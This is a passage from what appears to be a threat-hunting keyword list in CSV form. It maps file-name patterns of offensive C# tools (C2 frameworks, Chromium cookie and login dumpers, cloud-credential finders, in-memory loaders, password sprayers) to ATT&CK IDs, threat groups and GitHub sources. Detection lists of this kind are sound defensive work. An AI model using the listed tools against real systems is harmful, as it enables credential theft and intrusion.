T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2Webhook*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpCalendar.exe*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" +"*SharpCat.exe*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" +"*SharpChisel.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome backupkey*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.cs*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpchromium *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpChromium.csproj*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*SharpChromium.exe*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*SharpChromium.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChromium.sln*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" 
+"*SharpChromium-master*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*SharpClipHistory*","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Information Gathering","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","2","179","36","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z" +"*sharpcloud.cna*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*SharpCloud.csproj*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*SharpCloud.exe*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" 
+"*SharpCloud.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpCloud.sln*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z"
+"*SharpCloud-master*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z"
+"*SharpCOM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpCOMManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*sharpcompile*.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*sharpCompileHandler*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*SharpCompileServer*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*SharpCompileServer.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*SharpConfigParser.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*sharpcookiemonster*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*SharpCookieMonster*WebSocket4Net.dll*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z"
+"*SharpCookieMonster.csproj*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z"
+"*SharpCookieMonster.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpCookieMonster.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z"
+"*SharpCookieMonster.sln*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z"
+"*SharpCookieMonsterOriginal.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z"
+"*SharpCradle*logonpasswords*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z"
+"*SharpCradle.exe*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z"
+"*SharpCrashEventLog.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpDcomTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z"
+"*SharpDir.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpDllProxy*","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z"
+"*SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
+"*SharpDomainSpray.*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
